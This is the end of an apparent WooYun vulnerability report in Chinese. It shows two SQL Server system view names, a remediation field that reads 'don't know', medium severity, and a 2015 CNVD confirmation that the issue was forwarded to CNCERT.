| sys.dm_hadr_availability_replica_cluster_nodes |
| sys.dm_hadr_availability_replica_cluster_states |
|
修复方案:
不会
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-03-18 17:56
厂商回复:
CNVD确认所述情况,已转由CNCERT向相关部门通报。
最新状态:
暂无